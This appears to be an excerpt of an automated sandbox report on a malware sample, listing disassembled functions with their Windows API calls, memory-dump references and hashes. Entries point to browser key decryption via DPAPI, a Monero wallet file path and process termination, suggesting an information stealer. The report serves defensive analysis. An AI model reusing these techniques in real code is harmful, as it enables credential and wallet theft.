                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 2100535398-738592651
                                      • Opcode ID: e8f1a9b910226c40dcda042627b753c46bf2bedc5d79b260a810399c033e0c36
                                      • Instruction ID: ae49513b6739616462679fcfc5892afdf3a2913a2ccea4db7d963d1cb93cde5d
                                      • Opcode Fuzzy Hash: e8f1a9b910226c40dcda042627b753c46bf2bedc5d79b260a810399c033e0c36
                                      • Instruction Fuzzy Hash: 573110B6D1120DABCF04DB98DD45EFFB7B8BB68304F444519E906A7241E7359E04CBA2
                                      Function 00AD9660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00AD967B
                                        • Part of subcall function 00AD8EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00AD96AE,00000000), ref: 00AD8EEB
                                        • Part of subcall function 00AD8EE0: RtlAllocateHeap.NTDLL(00000000), ref: 00AD8EF2
                                        • Part of subcall function 00AD8EE0: wsprintfW.USER32 ref: 00AD8F08
                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00AD973B
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AD9759
                                      • CloseHandle.KERNEL32(00000000), ref: 00AD9766
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                      • String ID:
                                      • API String ID: 3729781310-0
                                      • Opcode ID: 51962a28eba9655500c23bd808997e99fb875d32e2801c14f4a68e72ed5f5a24
                                      • Instruction ID: 551fa8261b09c3aec5fd838176b650d31040a9d4dd709e13667ae96a95e41991
                                      • Opcode Fuzzy Hash: 51962a28eba9655500c23bd808997e99fb875d32e2801c14f4a68e72ed5f5a24
                                      • Instruction Fuzzy Hash: CA311A75E10308ABDB14DFE0CD49BEEB779BB44700F10445AF506AB284EB74AA48CB61
                                      Function 00AD8810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00AE05BF), ref: 00AD885A
                                      • Process32First.KERNEL32(?,00000128), ref: 00AD886E
                                      • Process32Next.KERNEL32(?,00000128), ref: 00AD8883
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • CloseHandle.KERNEL32(?), ref: 00AD88F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 2b38d64163d45fefd752a562a6007d6d61662053e11e29c529600c015defd758
                                      • Instruction ID: b5067ea31f53778067b4eac30ea99259bcec660cca7e09f333f99c396c3ea9c6
                                      • Opcode Fuzzy Hash: 2b38d64163d45fefd752a562a6007d6d61662053e11e29c529600c015defd758
                                      • Instruction Fuzzy Hash: C4316872911218ABCB24EF95CD55FEEB378FB15740F10459AF10BA22A0DB306E44CFA1
                                      Function 00B3FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B3FE13
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B3FE2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Value___vcrt_
                                      • String ID:
                                      • API String ID: 1426506684-0
                                      • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction ID: 54ab30d738eb32808ad00ba9e52ac230ea3fc53696b63368d2ec8dcd3f8e66d4
                                      • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction Fuzzy Hash: 3901B136909732AEFA3426B85CC997636D4EB017B5B304BBAF216802F2EF514C85A140
                                      Function 00AD7B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00AE0DE8,00000000,?), ref: 00AD7B40
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD7B47
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00AE0DE8,00000000,?), ref: 00AD7B54
                                      • wsprintfA.USER32 ref: 00AD7B83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: 625f2e02e49dbedfd5ba4c74ac752bdd50a7b464b2eb2d3b0e08bb1e5166917f
                                      • Instruction ID: 4f5a21ccbd6695855debe77b9648c71fe615ba8e8e7d6a2442b5927484283d5c
                                      • Opcode Fuzzy Hash: 625f2e02e49dbedfd5ba4c74ac752bdd50a7b464b2eb2d3b0e08bb1e5166917f
                                      • Instruction Fuzzy Hash: EC1139B2918218ABCB14DFC9DD45BBEB7B8FB4CB11F10425BF606A2280E7795940C7B4
                                      Function 00AD9470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00AD3D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00AD3D3E,?), ref: 00AD948C
                                      • GetFileSizeEx.KERNEL32(000000FF,00AD3D3E), ref: 00AD94A9
                                      • CloseHandle.KERNEL32(000000FF), ref: 00AD94B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      • Opcode ID: 5e72c97e7481c2359370b884c741518508466767e15dd451600be00d27725f69
                                      • Instruction ID: 826f39499c09e48d3115f34f66b5287a1e6d1dfb9f326665d39fe816429f7ce1
                                      • Opcode Fuzzy Hash: 5e72c97e7481c2359370b884c741518508466767e15dd451600be00d27725f69
                                      • Instruction Fuzzy Hash: BEF03779E14308BBDB10DBB0EC59F9F77B9AB48710F108695FA16E7380D670AA018B90
                                      Function 00ADCA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 00ADCA7E
                                        • Part of subcall function 00ADC2A0: __amsg_exit.LIBCMT ref: 00ADC2B0
                                      • __getptd.LIBCMT ref: 00ADCA95
                                      • __amsg_exit.LIBCMT ref: 00ADCAA3
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00ADCAC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 300741435-0
                                      • Opcode ID: cb9c27aa399a50c265e842e79e23c39322ebdee2783130ab3b529eeb5a0fd8bf
                                      • Instruction ID: c3c544f94fba7ee865408975159df28554ddba9b52860e270aa611b9b74d90fc
                                      • Opcode Fuzzy Hash: cb9c27aa399a50c265e842e79e23c39322ebdee2783130ab3b529eeb5a0fd8bf
                                      • Instruction Fuzzy Hash: 66F09632954316DBD620FBA8594774E33A1AF00B70F91014BF4079A3E2DF245941DBA5
                                      Function 00B404D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Catch
                                      • String ID: MOC$RCC
                                      • API String ID: 78271584-2084237596
                                      • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction ID: 72ec9c40ad02b4cd0436f3cc185ebc1a786226a2972c1a9111fd638552a77b12
                                      • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction Fuzzy Hash: 04414971900209AFDF15EF98DC81AAEBBF5FF58304F198199FA05A6211D3359A50EF50
                                      Function 00AD5190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00AD8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AD8F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD51CA
                                      • lstrcat.KERNEL32(?,00AE1058), ref: 00AD51E7
                                      • lstrcat.KERNEL32(?,01548BA8), ref: 00AD51FB
                                      • lstrcat.KERNEL32(?,00AE105C), ref: 00AD520D
                                        • Part of subcall function 00AD4B60: wsprintfA.USER32 ref: 00AD4B7C
                                        • Part of subcall function 00AD4B60: FindFirstFileA.KERNEL32(?,?), ref: 00AD4B93
                                        • Part of subcall function 00AD4B60: StrCmpCA.SHLWAPI(?,00AE0FC4), ref: 00AD4BC1
                                        • Part of subcall function 00AD4B60: StrCmpCA.SHLWAPI(?,00AE0FC8), ref: 00AD4BD7
                                        • Part of subcall function 00AD4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00AD4DCD
                                        • Part of subcall function 00AD4B60: FindClose.KERNEL32(000000FF), ref: 00AD4DE2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: aa18cc115c2afeb401b776b7e92267948ca37e8392c4b81afdfd18e981603eec
                                      • Instruction ID: 81b6113264661fa0176612dd96d5313bd3a35690da3eb1f71a351d600920ffb8
                                      • Opcode Fuzzy Hash: aa18cc115c2afeb401b776b7e92267948ca37e8392c4b81afdfd18e981603eec
                                      • Instruction Fuzzy Hash: 7321CC76A00308A7DB14FB70ED46FED333CAB59300F00455AB596D7291EE75EAC88BA5